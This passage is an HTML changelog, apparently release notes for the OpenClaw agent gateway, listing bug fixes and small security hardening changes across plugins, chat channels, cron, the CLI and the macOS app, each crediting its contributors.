<li>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LLagoon3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LLagoon3">@LLagoon3</a>.</li>
<li>Plugins/runtime-deps: replace stale symlinked mirror target roots before writing runtime-mirror temp files and skip rewriting already materialized hardlinks, so cross-version container upgrades no longer crash-loop on read-only image-layer paths while warm mirrors do less churn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358776355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75108/hovercard" href="https://github.com/openclaw/openclaw/issues/75108">#75108</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiaohuaxi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiaohuaxi">@xiaohuaxi</a>.</li>
<li>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eurojojo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eurojojo">@eurojojo</a>.</li>
<li>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Security/outbound: strip re-formed HTML tags during plain-text sanitization so nested tag fragments cannot leave a CodeQL-detected <code>&lt;script&gt;</code> sequence behind. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/secrets: compare credential bytes with padded timing-safe buffers instead of hashing candidate passwords before equality checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/QQBot: sanitize debug log arguments before writing to <code>console.*</code>, so gateway payload fields cannot forge extra log lines when debug logging is enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot: unify slash command auth and c2cOnly gating in the command registry, pass <code>allowQQBotDataDownloads</code> when sending slash command file attachments, align clear-storage with actual downloads directory, and add <code>/bot-me</code> to display sender user ID. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344118368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73616" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73616/hovercard" href="https://github.com/openclaw/openclaw/pull/73616">#73616</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cxyhhhhh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cxyhhhhh">@cxyhhhhh</a>.</li>
<li>CLI/agents/status: keep <code>openclaw agents</code>, text <code>agents list</code>, and plain text <code>status</code> on read-only metadata paths so human output no longer preloads plugin runtimes or live channel scans before printing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348784023" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74195/hovercard" href="https://github.com/openclaw/openclaw/issues/74195">#74195</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Agents/local models: derive context-window guard thresholds from the effective model window with 4k/8k safety floors, so small local models are no longer rejected by fixed 16k/32k preflight cutoffs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056859962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42999/hovercard" href="https://github.com/openclaw/openclaw/issues/42999">#42999</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chengjialu8888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chengjialu8888">@chengjialu8888</a>.</li>
<li>PDF extraction: resolve PDF.js standard fonts from the installed package root and pass a filesystem path to the Node fallback extractor, so built-in font PDFs render without <code>file://</code> URL lookup failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111579816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51455/hovercard" href="https://github.com/openclaw/openclaw/issues/51455">#51455</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320477272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70936/hovercard" href="https://github.com/openclaw/openclaw/pull/70936">#70936</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134943079" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54447" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54447/hovercard" href="https://github.com/openclaw/openclaw/pull/54447">#54447</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214513630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62175" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62175/hovercard" href="https://github.com/openclaw/openclaw/pull/62175">#62175</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JuanRdBO/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JuanRdBO">@JuanRdBO</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solomonneas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solomonneas">@solomonneas</a>.</li>
<li>Media: treat legacy Word/OLE attachments with <code>application/msword</code> or <code>application/x-cfb</code> MIME as binary so printable-looking <code>.doc</code> files are not embedded into prompts as text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131935972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54176" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54176/hovercard" href="https://github.com/openclaw/openclaw/issues/54176">#54176</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4133810089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54380" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54380/hovercard" href="https://github.com/openclaw/openclaw/pull/54380">#54380</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</li>
<li>Config: accept documented <code>browser.tabCleanup</code> keys in strict root config validation, so configured tab cleanup no longer fails before runtime reads it. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353207232" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74577" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74577/hovercard" href="https://github.com/openclaw/openclaw/issues/74577">#74577</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lonexreb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lonexreb">@lonexreb</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ezdlp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ezdlp">@ezdlp</a>.</li>
<li>Cron: validate disabled job schedule edits before persisting updates, so invalid cron changes no longer partially mutate stored jobs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351895210" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74459" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74459/hovercard" href="https://github.com/openclaw/openclaw/issues/74459">#74459</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</li>
<li>CLI/cron: warn when <code>openclaw cron add --message</code> omits a nonblank <code>--agent</code>, including blank agent values and session-key jobs, so scheduled agent-turn jobs make default-agent fallback explicit while system events stay quiet. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051936623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42196/hovercard" href="https://github.com/openclaw/openclaw/issues/42196">#42196</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052315763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42245" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42245/hovercard" href="https://github.com/openclaw/openclaw/pull/42245">#42245</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethanclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethanclaw">@ethanclaw</a>.</li>
<li>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/velvet-shark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/velvet-shark">@velvet-shark</a>.</li>
<li>Channels/status: keep Telegram, Slack, and Google Chat read-only allowlist/default-target accessors on config-only paths, so status and channel summaries do not resolve SecretRef-backed runtime credentials. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eusine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eusine">@eusine</a>.</li>
<li>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Telegram: clamp low long-polling client timeouts so configured <code>timeoutSeconds</code> values below the <code>getUpdates</code> poll window no longer force a fresh HTTPS connection every few seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358955789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75114/hovercard" href="https://github.com/openclaw/openclaw/issues/75114">#75114</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hpinho77/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hpinho77">@hpinho77</a>.</li>
<li>Active Memory: clarify the deprecated <code>modelFallbackPolicy</code> warning and config help so <code>modelFallback</code> is described as a chain-resolution last resort, not runtime failover. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353454562" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74602" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74602/hovercard" href="https://github.com/openclaw/openclaw/pull/74602">#74602</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
<li>Channels/Discord: keep read-only allowlist/default-target accessors from resolving SecretRef-backed bot tokens, so status and channel summaries no longer fail when tokens are only available in gateway runtime. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354779461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74737/hovercard" href="https://github.com/openclaw/openclaw/pull/74737">#74737</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eusine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eusine">@eusine</a>.</li>
<li>Gateway/sessions: align session abort wait semantics across <code>chat</code>, <code>agent</code>, and <code>sessions</code> server methods so abort RPCs return after the targeted sessions actually halt instead of resolving early while runs are still draining. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354883943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74751" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74751/hovercard" href="https://github.com/openclaw/openclaw/pull/74751">#74751</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Agents/output: drop copied inbound metadata-only assistant replay turns before provider replay instead of synthesizing a placeholder, so Telegram and other channels cannot receive <code>[assistant copied inbound metadata omitted]</code> as model output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354851470" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74745" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74745/hovercard" href="https://github.com/openclaw/openclaw/issues/74745">#74745</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adamwdear/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adamwdear">@adamwdear</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Doctor/memory: suppress skipped embedding-readiness warnings for key-optional providers such as Ollama and LM Studio while preserving timeout and not-ready diagnostics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353533459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74608/hovercard" href="https://github.com/openclaw/openclaw/issues/74608">#74608</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347037109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73882/hovercard" href="https://github.com/openclaw/openclaw/issues/73882">#73882</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Channels/groups: preserve observe-only turn suppression for prepared dispatch paths and restore deprecated channel turn runtime aliases, so passive observer/group flows stay silent while older plugins keep compiling. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu: skip empty-text messages (e.g. <code>{"text":""}</code>) that carry no media, so no blank user turn is written to the session and downstream LLM providers cannot reject the request with "messages must not be empty". (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353876867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74634" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74634/hovercard" href="https://github.com/openclaw/openclaw/issues/74634">#74634</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xdengli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xdengli">@xdengli</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Feishu/Bitable: clean up newly created placeholder rows whose fields contain only default empty values while preserving meaningful link, attachment, user, number, boolean, and location values during create-app cleanup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347281559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73920" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73920/hovercard" href="https://github.com/openclaw/openclaw/pull/73920">#73920</a>) Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043329694" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40602" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40602/hovercard" href="https://github.com/openclaw/openclaw/pull/40602">#40602</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/boat2moon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/boat2moon">@boat2moon</a>.</li>
<li>macOS app: keep attach-only mode and the Debug Settings launchd toggle marker-only, so launching with <code>--attach-only</code>/<code>--no-launchd</code> no longer uninstalls the Gateway LaunchAgent or drops active sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330918206" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72174" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72174/hovercard" href="https://github.com/openclaw/openclaw/pull/72174">#72174</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DolencLuka/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DolencLuka">@DolencLuka</a>.</li>
<li>macOS Canvas: stop auto-reloading the current A2UI host during push/eval/snapshot flows, so pushed A2UI content remains visible instead of returning to the empty Canvas shell. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341063728" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73337" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73337/hovercard" href="https://github.com/openclaw/openclaw/issues/73337">#73337</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gr4via/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gr4via">@Gr4via</a>.</li>
<li>Plugin SDK: restore the deprecated <code>plugin-sdk/zalouser</code> command-auth facade so published Lark/Zalo plugins that import it load on current hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354621148" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74702" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74702/hovercard" href="https://github.com/openclaw/openclaw/issues/74702">#74702</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Goron01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Goron01">@Goron01</a>.</li>
<li>Plugins/runtime-deps: include bundled provider plugins when <code>models.providers</code>, auth profiles, agent defaults, or subagent model refs configure that provider, while keeping inactive default-enabled provider plugins out of doctor repair. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350160379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74307" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74307/hovercard" href="https://github.com/openclaw/openclaw/issues/74307">#74307</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Skeptomenos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Skeptomenos">@Skeptomenos</a>.</li>
<li>Plugins/runtime: resolve relative plugin <code>api.resolvePath</code> inputs against the plugin root instead of the host working directory, while keeping absolute and home paths user-resolved. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354673479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74718/hovercard" href="https://github.com/openclaw/openclaw/pull/74718">#74718</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jimdawdy-hub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jimdawdy-hub">@jimdawdy-hub</a>.</li>
<li>Plugins/runtime-deps: refresh mirrored root chunks through a temporary file before replacing the active copy, so failed refreshes do not delete chunks that running plugin imports still need. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/runtime-deps: prefer <code>require</code> conditional exports when building staged dependency aliases, so CommonJS-only plugin runtime deps such as <code>ws</code> do not resolve to ESM wrappers under Jiti. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352876135" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74547" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74547/hovercard" href="https://github.com/openclaw/openclaw/issues/74547">#74547</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aderius/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aderius">@aderius</a>.</li>
<li>Bonjour/Gateway: cap flapping advertiser restarts in a sliding window, so mDNS probing/name-conflict loops disable discovery instead of churning indefinitely on constrained hosts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348958904" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74209" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74209/hovercard" href="https://github.com/openclaw/openclaw/issues/74209">#74209</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349224957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74242" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74242/hovercard" href="https://github.com/openclaw/openclaw/pull/74242">#74242</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ndj888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ndj888">@ndj888</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Plugins/runtime-deps: verify staged package entry files before reusing mirrored runtime roots, so browser-control repairs incomplete <code>ajv</code>/MCP SDK installs after update instead of failing after restart on a missing <code>ajv/dist/ajv.js</code>. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spickeringlr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spickeringlr">@spickeringlr</a>.</li>
<li>Heartbeat: resolve <code>responsePrefix</code> template variables with the selected provider, model, and thinking context before delivering alerts or suppressing prefixed <code>HEARTBEAT_OK</code> replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057207695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43064" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43064/hovercard" href="https://github.com/openclaw/openclaw/issues/43064">#43064</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057211022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43065" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43065/hovercard" href="https://github.com/openclaw/openclaw/pull/43065">#43065</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077564180" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46858" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46858/hovercard" href="https://github.com/openclaw/openclaw/pull/46858">#46858</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yweiii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yweiii">@yweiii</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JunJD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JunJD">@JunJD</a>.</li>
<li>Memory/LanceDB: show full memory UUIDs in the <code>memory_forget</code> candidate list so agents can pass the displayed ID back to targeted deletion without hitting the full-UUID validator. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265695758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66913" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66913/hovercard" href="https://github.com/openclaw/openclaw/pull/66913">#66913</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amittell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amittell">@amittell</a>.</li>
<li>File-transfer plugin: require canonical read-path preflight authorization for <code>file.fetch</code>, fail closed when <code>dir.fetch</code> preflight entries are missing, absolute, or traversing, and recheck returned archive entries before handing archive bytes to callers. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348342550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74134" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74134/hovercard" href="https://github.com/openclaw/openclaw/pull/74134">#74134</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
